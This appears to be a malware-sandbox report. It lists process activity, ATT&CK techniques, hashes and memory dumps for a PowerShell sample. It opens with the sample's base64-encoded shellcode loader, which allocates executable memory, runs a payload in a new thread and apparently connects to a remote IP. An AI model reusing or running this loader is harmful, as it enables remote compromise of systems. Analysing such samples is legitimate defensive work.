DYAOAAsADAAeAA0ADQALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA0AGYALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADEAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADEAMgAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADAAMQAsADAAeABjADMALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAZQA1ACwAMAB4ADUAOAAsADAAeABjADMALAAwAHgANQBmACwAMAB4AGUAOAAsADAAeAA2ADkALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAMwAxACwAMAB4ADMAOQAsADAAeAAzADIALAAwAHgAMgBlACwAMAB4ADMAMQAsADAAeAAzADYALAAwAHgAMwA4ACwAMAB4ADIAZQAsADAAeAAzADAALAAwAHgAMgBlACwAMAB4ADMAMQAsADAAeAAzADEALAAwAHgAMwA0ACwAMAB4ADAAMAA7ACQAcwBpAHoAZQAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABzAGMALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAcwBpAHoAZQAgAD0AIAAkAHMAYwAuAEwAZQBuAGcAdABoAH0AOwAkAHgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABzAGkAegBlACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJABzAGMALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAeAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAcwBjAFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAB4ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1496

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ziiuh1c1\ziiuh1c1.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C56.tmp" "c:\Users\Admin\AppData\Local\Temp\ziiuh1c1\CSC50E08674EA140CE88C44C66DD677D30.TMP"
5⤵
PID:3616

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES8C56.tmp
Filesize
1KB

MD5
f6e1154657ff337a81a4c0be15855703

SHA1
83b2a1c3fc17c1434a2a2e2ba53289df26ddfe86

SHA256
8220eac0638c1ca67471969532b742d707613f3e66e2a5a55c66bab442f2ac67

SHA512
abc4193c73137d6fb3b1ba80f131a5d0f32240c59ab413373d2756f864e048407a13e458eef1bf59b7bf8a9f4e3a990125aac46bcb565cd0e4aa3fab39ea6bba

Download Submit
C:\Users\Admin\AppData\Local\Temp\ziiuh1c1\ziiuh1c1.dll
Filesize
3KB

MD5
12fe1f8bdce552a1cd63c0ceb95327b5

SHA1
627511ba6cd4646348e409d2449383cdfe2c6c1e

SHA256
50606d9eb940082aa267fc2d2bb7000d1832f3e9567f54c36818e3b541ab3b42

SHA512
680e5d4d3fec7deade4f2734efbd58daf08403f2cdd62cfa2893e23fbc850f5895ed09c9c03130ea397cba72b74e4214792e80847e8040bd1ccf4a9f3114d8ab

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ziiuh1c1\CSC50E08674EA140CE88C44C66DD677D30.TMP
Filesize
652B

MD5
fc103e38fbfd9ce70e36910b01a02a59

SHA1
f1644ee31f02a3e23ff360be794b5f3eadb8360b

SHA256
65e72826028538d04fb69c5c08ec9503ff50d560c17d8237d663813b9e1d69a4

SHA512
2c3880da7d4d0edecd9a8185daa12b43bd24b5533d29f88371fb7fec443b6d6db537632d4ccbf10c64d53c90332f77c2170638de309e1e93b231a3547beeb12b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ziiuh1c1\ziiuh1c1.0.cs
Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ziiuh1c1\ziiuh1c1.cmdline
Filesize
369B

MD5
3233db5a93b8226878fcf914106a155c

SHA1
7e7da3bc7e743e2ccde4c13bca81f68d732d4365

SHA256
439a829ef1db70252469aa49363bdc7ee53927a6acd8731208f4ebbeab8f4e6b

SHA512
d2064b250a91d9e314cb809dd124ad83db6f067045a7c30c9144d020957f0e8965bb2586c60ed7338d0e9bfdcbeb78b9444a41790f5beb2b5fe9b5ee2a1106c1

Download Submit
memory/1496-146-0x00000000057A0000-0x0000000005806000-memory.dmp

Filesize
408KB

Download
memory/1496-150-0x0000000006390000-0x00000000063AA000-memory.dmp

Filesize
104KB

Download
memory/1496-149-0x00000000074E0000-0x0000000007B5A000-memory.dmp

Filesize
6.5MB

Download
memory/1496-148-0x0000000004C20000-0x0000000004C3E000-memory.dmp

Filesize
120KB

Download
memory/1496-141-0x0000000000000000-mapping.dmp

Download
memory/1496-147-0x0000000005880000-0x00000000058E6000-memory.dmp

Filesize
408KB

Download
memory/1496-142-0x0000000002890000-0x00000000028C6000-memory.dmp

Filesize
216KB

Download
memory/1496-144-0x0000000005040000-0x0000000005668000-memory.dmp

Filesize
6.2MB

Download
memory/1496-145-0x0000000004FA0000-0x0000000004FC2000-memory.dmp

Filesize
136KB

Download
memory/3616-154-0x0000000000000000-mapping.dmp

Download
memory/3804-158-0x00007FFD90470000-0x00007FFD90F31000-memory.dmp

Filesize
10.8MB

Download
memory/3804-140-0x000002195D470000-0x000002195D492000-memory.dmp

Filesize
136KB

Download
memory/3804-139-0x0000000000000000-mapping.dmp

Download
memory/3804-143-0x00007FFD90470000-0x00007FFD90F31000-memory.dmp

Filesize
10.8MB

Download
memory/3964-151-0x0000000000000000-mapping.dmp

Download
memory/4584-136-0x00007FFD7C090000-0x00007FFD7C0A0000-memory.dmp

Filesize
64KB

Download
memory/4584-137-0x00007FFD79940000-0x00007FFD79950000-memory.dmp

Filesize
64KB

Download
memory/4584-135-0x00007FFD7C090000-0x00007FFD7C0A0000-memory.dmp

Filesize
64KB

Download
memory/4584-138-0x00007FFD79940000-0x00007FFD79950000-memory.dmp

Filesize
64KB

Download
memory/4584-134-0x00007FFD7C090000-0x00007FFD7C0A0000-memory.dmp

Filesize
64KB

Download
memory/4584-133-0x00007FFD7C090000-0x00007FFD7C0A0000-memory.dmp

Filesize
64KB

Download
memory/4584-132-0x00007FFD7C090000-0x00007FFD7C0A0000-memory.dmp

Filesize
64KB

Download
memory/4584-161-0x00007FFD7C090000-0x00007FFD7C0A0000-memory.dmp

Filesize
64KB

Download
memory/4584-160-0x00007FFD7C090000-0x00007FFD7C0A0000-memory.dmp

Filesize
64KB

Download
memory/4584-162-0x00007FFD7C090000-0x00007FFD7C0A0000-memory.dmp

Filesize
64KB

Download
memory/4584-163-0x00007FFD7C090000-0x00007FFD7C0A0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads